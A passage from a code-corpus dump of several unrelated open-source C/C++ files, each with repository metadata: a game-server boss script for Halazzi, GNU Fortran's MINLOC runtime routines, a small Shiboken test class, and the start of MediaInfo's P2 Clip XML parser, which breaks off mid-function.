DoPlaySoundToSet(me, SOUND_MERGE);
// Make the lynx unattackable and walk both toward each other.
pLynx->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NON_ATTACKABLE);
pLynx->GetMotionMaster()->Clear();
pLynx->GetMotionMaster()->MoveFollow(me, 0, 0);
me->GetMotionMaster()->Clear();
me->GetMotionMaster()->MoveFollow(pLynx, 0, 0);
++TransformCount;
}
break;
default:
break;
}
Phase = NextPhase;
}
void UpdateAI(uint32 diff)
{
if (!UpdateVictim())
return;
// Hard-enrage yell + buff; re-applied every minute thereafter.
if (BerserkTimer <= diff)
{
me->MonsterYell(YELL_BERSERK, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_BERSERK);
DoCast(me, SPELL_BERSERK, true);
BerserkTimer = 60000;
} else BerserkTimer -= diff;
if (Phase == PHASE_LYNX || Phase == PHASE_ENRAGE)
{
if (SaberlashTimer <= diff)
{
// A tank with more than 490 defense skills should receive no critical hit
//DoCast(me, 41296, true);
DoCastVictim(SPELL_SABER_LASH, true);
//me->RemoveAurasDueToSpell(41296);
SaberlashTimer = 30000;
} else SaberlashTimer -= diff;
if (FrenzyTimer <= diff)
{
DoCast(me, SPELL_FRENZY);
FrenzyTimer = urand(10000, 15000);
} else FrenzyTimer -= diff;
if (Phase == PHASE_LYNX)
{
// Split at 75% / 50% / 25% depending on merges done so far.
if (CheckTimer <= diff)
{
if (HealthBelowPct(25 * (3 - TransformCount)))
EnterPhase(PHASE_SPLIT);
CheckTimer = 1000;
} else CheckTimer -= diff;
}
}
if (Phase == PHASE_HUMAN || Phase == PHASE_ENRAGE)
{
if (TotemTimer <= diff)
{
DoCast(me, SPELL_SUMMON_TOTEM);
TotemTimer = 20000;
} else TotemTimer -= diff;
if (ShockTimer <= diff)
{
// Earth shock interrupts casters, flame shock otherwise.
if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0))
{
if (target->IsNonMeleeSpellCasted(false))
DoCast(target, SPELL_EARTHSHOCK);
else
DoCast(target, SPELL_FLAMESHOCK);
ShockTimer = urand(10000, 15000);
}
} else ShockTimer -= diff;
if (Phase == PHASE_HUMAN)
{
// Merge when either the boss or the lynx falls to 20%.
if (CheckTimer <= diff)
{
if (!HealthAbovePct(20) /*HealthBelowPct(10)*/)
EnterPhase(PHASE_MERGE);
else
{
Unit* Lynx = Unit::GetUnit(*me, LynxGUID);
if (Lynx && !Lynx->HealthAbovePct(20) /*Lynx->HealthBelowPct(10)*/)
EnterPhase(PHASE_MERGE);
}
CheckTimer = 1000;
} else CheckTimer -= diff;
}
}
if (Phase == PHASE_MERGE)
{
// Keep both units walking together; complete the merge on contact.
if (CheckTimer <= diff)
{
Unit* Lynx = Unit::GetUnit(*me, LynxGUID);
if (Lynx)
{
Lynx->GetMotionMaster()->MoveFollow(me, 0, 0);
me->GetMotionMaster()->MoveFollow(Lynx, 0, 0);
if (me->IsWithinDistInMap(Lynx, 6.0f))
{
if (TransformCount < 3)
EnterPhase(PHASE_LYNX);
else
EnterPhase(PHASE_ENRAGE);
}
}
CheckTimer = 1000;
} else CheckTimer -= diff;
}
DoMeleeAttackIfReady();
}
// Random kill yell.
void KilledUnit(Unit* /*victim*/)
{
switch (urand(0, 1))
{
case 0:
me->MonsterYell(YELL_KILL_ONE, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_KILL_ONE);
break;
case 1:
me->MonsterYell(YELL_KILL_TWO, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_KILL_TWO);
break;
}
}
void JustDied(Unit* /*killer*/)
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, DONE);
me->MonsterYell(YELL_DEATH, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_DEATH);
}
};
CreatureAI* GetAI(Creature* creature) const
{
return new boss_halazziAI(creature);
}
};
// Spirits Lynx AI
// Spirit Lynx add summoned during Halazzi's human phase: periodically
// frenzies and shreds the tank's armor; like the boss, it cannot die
// (damage is capped) because it is absorbed back on merge.
class mob_halazzi_lynx : public CreatureScript
{
public:
mob_halazzi_lynx()
: CreatureScript("mob_halazzi_lynx")
{
}
struct mob_halazzi_lynxAI : public ScriptedAI
{
mob_halazzi_lynxAI(Creature* creature) : ScriptedAI(creature) {}
uint32 FrenzyTimer;
uint32 shredder_timer;
void Reset()
{
FrenzyTimer = urand(30000, 50000); //frenzy every 30-50 seconds
shredder_timer = 4000;
}
// The lynx is never allowed to die; it despawns on merge instead.
void DamageTaken(Unit* /*done_by*/, uint32 &damage)
{
if (damage >= me->GetHealth())
damage = 0;
}
// Do not engage while flagged non-attackable (merge walk-back).
void AttackStart(Unit* who)
{
if (!me->HasFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NON_ATTACKABLE))
ScriptedAI::AttackStart(who);
}
void EnterCombat(Unit* /*who*/) {/*DoZoneInCombat();*/}
void UpdateAI(uint32 diff)
{
if (!UpdateVictim())
return;
if (FrenzyTimer <= diff)
{
DoCast(me, SPELL_LYNX_FRENZY);
FrenzyTimer = urand(30000, 50000); //frenzy every 30-50 seconds
} else FrenzyTimer -= diff;
if (shredder_timer <= diff)
{
DoCastVictim(SPELL_SHRED_ARMOR);
shredder_timer = 4000;
} else shredder_timer -= diff;
DoMeleeAttackIfReady();
}
};
CreatureAI* GetAI(Creature* creature) const
{
return new mob_halazzi_lynxAI(creature);
}
};
// Registers both encounter scripts with the script manager; the objects
// register themselves via the CreatureScript base constructor.
void AddSC_boss_halazzi()
{
new boss_halazzi();
new mob_halazzi_lynx();
}
| gpl-2.0 |
mickael-guene/gcc | libgfortran/generated/minloc1_4_r10.c | 3 | 13179 | /* Implementation of the MINLOC intrinsic
Copyright (C) 2002-2017 Free Software Foundation, Inc.
Contributed by Paul Brook <paul@nowt.org>
This file is part of the GNU Fortran runtime library (libgfortran).
Libgfortran is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
Libgfortran is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
Under Section 7 of GPL version 3, you are granted additional
permissions described in the GCC Runtime Library Exception, version
3.1, as published by the Free Software Foundation.
You should have received a copy of the GNU General Public License and
a copy of the GCC Runtime Library Exception along with this program;
see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
<http://www.gnu.org/licenses/>. */
#include "libgfortran.h"
#if defined (HAVE_GFC_REAL_10) && defined (HAVE_GFC_INTEGER_4)
extern void minloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict);
export_proto(minloc1_4_r10);
/*
 * minloc1_4_r10 - MINLOC along one dimension, no mask.
 * Computes, for each vector of @array (REAL(10)) taken along dimension
 * *@pdim (1-based), the 1-based index of its first minimum, storing the
 * results in @retarray (INTEGER(4), rank reduced by one).  Allocates and
 * shapes @retarray when its base_addr is NULL; otherwise validates rank
 * (and bounds when -fbounds-check is on).  With IEEE NaN support the scan
 * first skips leading NaNs (a NaN never satisfies "<="), then does the
 * ordinary strict-less-than scan.  Generated code: structure mirrors the
 * other {min,max}loc1 variants.
 */
void
minloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type sstride[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
const GFC_REAL_10 * restrict base;
GFC_INTEGER_4 * restrict dest;
index_type rank;
index_type n;
index_type len;
index_type delta;
index_type dim;
int continue_loop;
/* Make dim zero based to avoid confusion. */
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
len = GFC_DESCRIPTOR_EXTENT(array,dim);
if (len < 0)
len = 0;
delta = GFC_DESCRIPTOR_STRIDE(array,dim);
/* Strides/extents of the dimensions that survive the reduction. */
for (n = 0; n < dim; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n);
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] < 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array, n + 1);
extent[n] = GFC_DESCRIPTOR_EXTENT(array, n + 1);
if (extent[n] < 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
/* Caller passed an unallocated result: shape and allocate it here. */
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str = GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in"
" MINLOC intrinsic: is %ld, should be %ld",
(long int) (GFC_DESCRIPTOR_RANK (retarray)),
(long int) rank);
if (unlikely (compile_options.bounds_check))
bounds_ifunction_return ((array_t *) retarray, extent,
"return value", "MINLOC");
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
if (extent[n] <= 0)
return;
}
base = array->base_addr;
dest = retarray->base_addr;
continue_loop = 1;
/* Odometer walk over all result elements; one reduction per iteration. */
while (continue_loop)
{
const GFC_REAL_10 * restrict src;
GFC_INTEGER_4 result;
src = base;
{
GFC_REAL_10 minval;
#if defined (GFC_REAL_10_INFINITY)
minval = GFC_REAL_10_INFINITY;
#else
minval = GFC_REAL_10_HUGE;
#endif
result = 1;
if (len <= 0)
*dest = 0;
else
{
/* First loop: find the first non-NaN (NaN fails "<=") ... */
for (n = 0; n < len; n++, src += delta)
{
#if defined (GFC_REAL_10_QUIET_NAN)
if (*src <= minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
break;
}
}
/* ... then continue with the plain strict-minimum scan. */
for (; n < len; n++, src += delta)
{
#endif
if (*src < minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
}
}
*dest = result;
}
}
/* Advance to the next element. */
count[0]++;
base += sstride[0];
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
base -= sstride[n] * extent[n];
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
{
/* Break out of the look. */
continue_loop = 0;
break;
}
else
{
count[n]++;
base += sstride[n];
dest += dstride[n];
}
}
}
}
extern void mminloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict,
gfc_array_l1 * const restrict);
export_proto(mminloc1_4_r10);
/*
 * mminloc1_4_r10 - MINLOC along one dimension with an array MASK.
 * Same reduction as minloc1_4_r10 but only elements whose corresponding
 * @mask entry is true participate; the result is 0 when no element of a
 * vector is selected.  The mask may be LOGICAL of kind 1/2/4/8(/16);
 * GFOR_POINTER_TO_L1 repositions the byte pointer so each element's
 * truth byte is read through a GFC_LOGICAL_1 pointer with a byte stride.
 * Generated code: structure mirrors the other m{min,max}loc1 variants.
 */
void
mminloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim,
gfc_array_l1 * const restrict mask)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type sstride[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
index_type mstride[GFC_MAX_DIMENSIONS];
GFC_INTEGER_4 * restrict dest;
const GFC_REAL_10 * restrict base;
const GFC_LOGICAL_1 * restrict mbase;
int rank;
int dim;
index_type n;
index_type len;
index_type delta;
index_type mdelta;
int mask_kind;
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
len = GFC_DESCRIPTOR_EXTENT(array,dim);
if (len <= 0)
return;
mbase = mask->base_addr;
mask_kind = GFC_DESCRIPTOR_SIZE (mask);
if (mask_kind == 1 || mask_kind == 2 || mask_kind == 4 || mask_kind == 8
#ifdef HAVE_GFC_LOGICAL_16
|| mask_kind == 16
#endif
)
/* Point at the significant byte of each logical element. */
mbase = GFOR_POINTER_TO_L1 (mbase, mask_kind);
else
runtime_error ("Funny sized logical array");
delta = GFC_DESCRIPTOR_STRIDE(array,dim);
mdelta = GFC_DESCRIPTOR_STRIDE_BYTES(mask,dim);
/* Strides/extents of the surviving dimensions (mask strides in bytes). */
for (n = 0; n < dim; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n);
mstride[n] = GFC_DESCRIPTOR_STRIDE_BYTES(mask,n);
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] < 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n + 1);
mstride[n] = GFC_DESCRIPTOR_STRIDE_BYTES(mask, n + 1);
extent[n] = GFC_DESCRIPTOR_EXTENT(array, n + 1);
if (extent[n] < 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
/* Caller passed an unallocated result: shape and allocate it here. */
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str= GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
else
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in MINLOC intrinsic");
if (unlikely (compile_options.bounds_check))
{
bounds_ifunction_return ((array_t *) retarray, extent,
"return value", "MINLOC");
bounds_equal_extents ((array_t *) mask, (array_t *) array,
"MASK argument", "MINLOC");
}
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
if (extent[n] <= 0)
return;
}
dest = retarray->base_addr;
base = array->base_addr;
/* Odometer walk; base is set to NULL to terminate (see below). */
while (base)
{
const GFC_REAL_10 * restrict src;
const GFC_LOGICAL_1 * restrict msrc;
GFC_INTEGER_4 result;
src = base;
msrc = mbase;
{
GFC_REAL_10 minval;
#if defined (GFC_REAL_10_INFINITY)
minval = GFC_REAL_10_INFINITY;
#else
minval = GFC_REAL_10_HUGE;
#endif
#if defined (GFC_REAL_10_QUIET_NAN)
/* result2 remembers the first masked-in position in case the
vector turns out to be all NaNs. */
GFC_INTEGER_4 result2 = 0;
#endif
result = 0;
/* First loop: find the first masked-in non-NaN element. */
for (n = 0; n < len; n++, src += delta, msrc += mdelta)
{
if (*msrc)
{
#if defined (GFC_REAL_10_QUIET_NAN)
if (!result2)
result2 = (GFC_INTEGER_4)n + 1;
if (*src <= minval)
#endif
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
break;
}
}
}
#if defined (GFC_REAL_10_QUIET_NAN)
if (unlikely (n >= len))
result = result2;
else
#endif
/* Continue with the plain strict-minimum scan. */
for (; n < len; n++, src += delta, msrc += mdelta)
{
if (*msrc && *src < minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
}
}
*dest = result;
}
/* Advance to the next element. */
count[0]++;
base += sstride[0];
mbase += mstride[0];
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
base -= sstride[n] * extent[n];
mbase -= mstride[n] * extent[n];
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
{
/* Break out of the look. */
base = NULL;
break;
}
else
{
count[n]++;
base += sstride[n];
mbase += mstride[n];
dest += dstride[n];
}
}
}
}
extern void sminloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict,
GFC_LOGICAL_4 *);
export_proto(sminloc1_4_r10);
/*
 * sminloc1_4_r10 - MINLOC along one dimension with a scalar MASK.
 * When *@mask is true this is exactly minloc1_4_r10; when false, MINLOC
 * of an empty selection is defined to be 0, so the result array is shaped
 * (or validated) the same way and then filled with zeros.
 * Generated code: structure mirrors the other s{min,max}loc1 variants.
 */
void
sminloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim,
GFC_LOGICAL_4 * mask)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
GFC_INTEGER_4 * restrict dest;
index_type rank;
index_type n;
index_type dim;
if (*mask)
{
/* True scalar mask: identical to the unmasked reduction. */
minloc1_4_r10 (retarray, array, pdim);
return;
}
/* Make dim zero based to avoid confusion. */
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
for (n = 0; n < dim; n++)
{
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] <= 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
extent[n] =
GFC_DESCRIPTOR_EXTENT(array,n + 1);
if (extent[n] <= 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
/* Caller passed an unallocated result: shape and allocate it here. */
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str = GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
else
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in"
" MINLOC intrinsic: is %ld, should be %ld",
(long int) (GFC_DESCRIPTOR_RANK (retarray)),
(long int) rank);
if (unlikely (compile_options.bounds_check))
{
for (n=0; n < rank; n++)
{
index_type ret_extent;
ret_extent = GFC_DESCRIPTOR_EXTENT(retarray,n);
if (extent[n] != ret_extent)
runtime_error ("Incorrect extent in return value of"
" MINLOC intrinsic in dimension %ld:"
" is %ld, should be %ld", (long int) n + 1,
(long int) ret_extent, (long int) extent[n]);
}
}
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
}
dest = retarray->base_addr;
/* False scalar mask: every result element is 0 by definition. */
while(1)
{
*dest = 0;
count[0]++;
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
return;
else
{
count[n]++;
dest += dstride[n];
}
}
}
}
#endif
| gpl-2.0 |
M4rtinK/shiboken-android | tests/libminimal/obj.cpp | 3 | 1083 | /*
* This file is part of the Shiboken Python Binding Generator project.
*
* Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
*
* Contact: PySide team <contact@pyside.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "obj.h"
// Constructs an Obj storing the given numeric identifier in m_objId.
Obj::Obj(int objId) : m_objId(objId)
{
}
// Out-of-line destructor; no resources to release (anchors the vtable).
Obj::~Obj()
{
}
// Returns true when `val` is even, false when it is odd.
bool
Obj::virtualMethod(int val)
{
return (val % 2) == 0;
}
| gpl-2.0 |
eagleatustb/p2pdown | source/third_party/MediaInfoLib/Source/MediaInfo/Multiple/File_P2_Clip.cpp | 3 | 19471 | // File_P2_Clip - Info for P2 Clip (XML) files
// Copyright (C) 2010-2011 MediaArea.net SARL, Info@MediaArea.net
//
// This library is free software: you can redistribute it and/or modify it
// under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// any later version.
//
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with this library. If not, see <http://www.gnu.org/licenses/>.
//
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//---------------------------------------------------------------------------
// Pre-compilation
#include "MediaInfo/PreComp.h"
#ifdef __BORLANDC__
#pragma hdrstop
#endif
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#include "MediaInfo/Setup.h"
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#if defined(MEDIAINFO_P2_YES)
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#include "MediaInfo/Multiple/File_P2_Clip.h"
#include "MediaInfo/MediaInfo.h"
#include "MediaInfo/MediaInfo_Internal.h"
#include "MediaInfo/Multiple/File__ReferenceFilesHelper.h"
#include "ZenLib/Dir.h"
#include "ZenLib/FileName.h"
#include "ZenLib/TinyXml/tinyxml.h"
//---------------------------------------------------------------------------
namespace MediaInfoLib
{
//***************************************************************************
// Constructor/Destructor
//***************************************************************************
//---------------------------------------------------------------------------
File_P2_Clip::File_P2_Clip()
    : File__Analyze(),
      ReferenceFiles(NULL) // helper is created lazily once the XML is accepted
{
}
//---------------------------------------------------------------------------
// Release the owned reference-file helper (deleting NULL is safe when the
// clip XML was never accepted).
File_P2_Clip::~File_P2_Clip()
{
    delete ReferenceFiles; //ReferenceFiles=NULL;
}
//***************************************************************************
// Streams management
//***************************************************************************
//---------------------------------------------------------------------------
// Finalize: parse the referenced essence files collected from the clip
// XML, if any were found.
void File_P2_Clip::Streams_Finish()
{
    if (ReferenceFiles!=NULL)
        ReferenceFiles->ParseReferences();
}
//***************************************************************************
// Buffer - Global
//***************************************************************************
//---------------------------------------------------------------------------
#if MEDIAINFO_SEEK
// Delegate seek requests to the referenced essence files; 0 when there is
// nothing to seek in.
size_t File_P2_Clip::Read_Buffer_Seek (size_t Method, int64u Value, int64u ID)
{
    return ReferenceFiles==NULL ? 0
                                : ReferenceFiles->Read_Buffer_Seek(Method, Value, ID);
}
#endif //MEDIAINFO_SEEK
//***************************************************************************
// Buffer - File header
//***************************************************************************
//---------------------------------------------------------------------------
// Parse a complete P2 clip XML (the file is fully buffered first), fill
// General-stream metadata, and build the list of referenced MXF essence
// files. Returns false to reject the file or request more data; true once
// the header has been fully handled.
bool File_P2_Clip::FileHeader_Begin()
{
    //Element_Size
    if (File_Size<5 || File_Size>64*1024)
    {
        Reject("P2_Clip");
        return false; //P2_Clip XML files are not big
    }

    //Element_Size
    if (Buffer_Size<File_Size)
        return false; //Must wait for more data

    //XML header
    if (Buffer[0]!='<'
     || Buffer[1]!='?'
     || Buffer[2]!='x'
     || Buffer[3]!='m'
     || Buffer[4]!='l')
    {
        Reject("P2_Clip");
        return false;
    }

    TiXmlDocument document(File_Name.To_Local());
    if (document.LoadFile())
    {
        TiXmlElement* Root=document.FirstChildElement("P2Main");
        if (Root)
        {
            Accept("P2_Clip");
            Fill(Stream_General, 0, General_Format, "P2 Clip");
            ReferenceFiles=new File__ReferenceFilesHelper(this, Config);

            TiXmlElement* ClipContent=Root->FirstChildElement("ClipContent");
            if (ClipContent)
            {
                TiXmlElement* ChildElement;

                //ID
                ChildElement=ClipContent->FirstChildElement("GlobalClipID");
                if (ChildElement)
                    Fill(Stream_General, 0, General_UniqueID, ChildElement->GetText());

                //Duration: frame count * EditUnit ("num/den" seconds per frame)
                Ztring Duration, EditUnit;
                ChildElement=ClipContent->FirstChildElement("Duration");
                if (ChildElement)
                    Duration=ChildElement->GetText();
                ChildElement=ClipContent->FirstChildElement("EditUnit");
                if (ChildElement)
                    EditUnit=ChildElement->GetText();
                int64u Duration_Frames=Duration.To_int64u();
                int64u EditUnit_Numerator=EditUnit.SubString(Ztring(), _T("/")).To_int64u();
                int64u EditUnit_Denominator=EditUnit.SubString(_T("/"), Ztring()).To_int64u();
                if (Duration_Frames && EditUnit_Numerator && EditUnit_Denominator)
                    Fill(Stream_General, 0, General_Duration, ((float32)Duration_Frames)*1000*EditUnit_Numerator/EditUnit_Denominator, 0);

                //EssenceList: one child element per essence track
                TiXmlElement* EssenceList=ClipContent->FirstChildElement("EssenceList");
                if (EssenceList)
                {
                    TiXmlElement* Track=EssenceList->FirstChildElement();
                    size_t Audio_Count=0;
                    while (Track)
                    {
                        string Field=Track->ValueStr();
                        if (Field=="Video")
                        {
                            File__ReferenceFilesHelper::reference ReferenceFile;

                            //FrameRate: map NTSC-style labels to exact rationals
                            ChildElement=Track->FirstChildElement("FrameRate");
                            if (ChildElement)
                            {
                                Ztring FrameRateS=Ztring(ChildElement->GetText());
                                if (FrameRateS.find(_T("23.97"))==0)
                                    ReferenceFile.FrameRate=((float64)24)*1000/1001;
                                else if (FrameRateS.find(_T("29.97"))==0)
                                    ReferenceFile.FrameRate=((float64)30)*1000/1001;
                                else if (FrameRateS.find(_T("59.94"))==0)
                                    ReferenceFile.FrameRate=((float64)60)*1000/1001;
                                else
                                    ReferenceFile.FrameRate=FrameRateS.To_float64();
                                if (FrameRateS.find('i')!=string::npos)
                                    ReferenceFile.FrameRate/=2; //interlaced suffix: field rate given
                            }

                            //StartTimecode "HH:MM:SS:FF" -> milliseconds
                            //(comment was mislabeled "CreationDate" in the original)
                            ChildElement=Track->FirstChildElement("StartTimecode");
                            if (ChildElement)
                            {
                                string Text=ChildElement->GetText();
                                if (Text.size()==11)
                                {
                                    int64u ToFill=(Text[0]-'0')*10*60*60*1000
                                                + (Text[1]-'0')   *60*60*1000
                                                + (Text[3]-'0')   *10*60*1000
                                                + (Text[4]-'0')      *60*1000
                                                + (Text[6]-'0')      *10*1000
                                                + (Text[7]-'0')         *1000;
                                    if (ReferenceFile.FrameRate)
                                        ToFill+=float64_int64s(((Text[9]-'0')*10+(Text[10]-'0'))*1000/ReferenceFile.FrameRate);
                                    //Fill(Stream_Video, StreamPos_Last, Video_Delay, ToFill);
                                    //Fill(Stream_Video, StreamPos_Last, Video_Delay_Source, "P2 Clip");
                                }
                            }

                            //Derive essence path: .../CLIP/xxxxxx.XML -> .../VIDEO/xxxxxx.MXF
                            //(case-insensitive "CLIP" test via &~0x20 ASCII upcasing)
                            #if defined(MEDIAINFO_MXF_YES)
                            if (File_Name.size()>10+1+4
                             && File_Name[File_Name.size()-10-1]==PathSeparator
                             && (File_Name[File_Name.size()-10-2]&(~0x20))==_T('P')
                             && (File_Name[File_Name.size()-10-3]&(~0x20))==_T('I')
                             && (File_Name[File_Name.size()-10-4]&(~0x20))==_T('L')
                             && (File_Name[File_Name.size()-10-5]&(~0x20))==_T('C'))
                            {
                                Ztring file=File_Name.substr(File_Name.size()-10, 6);
                                Ztring MXF_File=File_Name;
                                MXF_File.resize(MXF_File.size()-(10+1+4));
                                MXF_File+=_T("VIDEO");
                                MXF_File+=PathSeparator;
                                MXF_File+=file;
                                MXF_File+=_T(".MXF");
                                ReferenceFile.FileNames.push_back(MXF_File);
                                ReferenceFile.StreamKind=Stream_Video;
                                ReferenceFile.StreamID=Ztring::ToZtring(ReferenceFiles->References.size()+1);
                                ReferenceFiles->References.push_back(ReferenceFile);
                            }
                            #endif //defined(MEDIAINFO_MXF_YES)
                        }
                        else if (Field=="Audio")
                        {
                            //Essence path: .../CLIP/xxxxxx.XML -> .../AUDIO/xxxxxxNN.MXF
                            //where NN is the zero-padded audio track index
                            #if defined(MEDIAINFO_MXF_YES)
                            if (File_Name.size()>10+1+4
                             && File_Name[File_Name.size()-10-1]==PathSeparator
                             && (File_Name[File_Name.size()-10-2]&(~0x20))==_T('P')
                             && (File_Name[File_Name.size()-10-3]&(~0x20))==_T('I')
                             && (File_Name[File_Name.size()-10-4]&(~0x20))==_T('L')
                             && (File_Name[File_Name.size()-10-5]&(~0x20))==_T('C'))
                            {
                                Ztring file=File_Name.substr(File_Name.size()-10, 6);
                                Ztring MXF_File=File_Name;
                                MXF_File.resize(MXF_File.size()-(10+1+4));
                                MXF_File+=_T("AUDIO");
                                MXF_File+=PathSeparator;
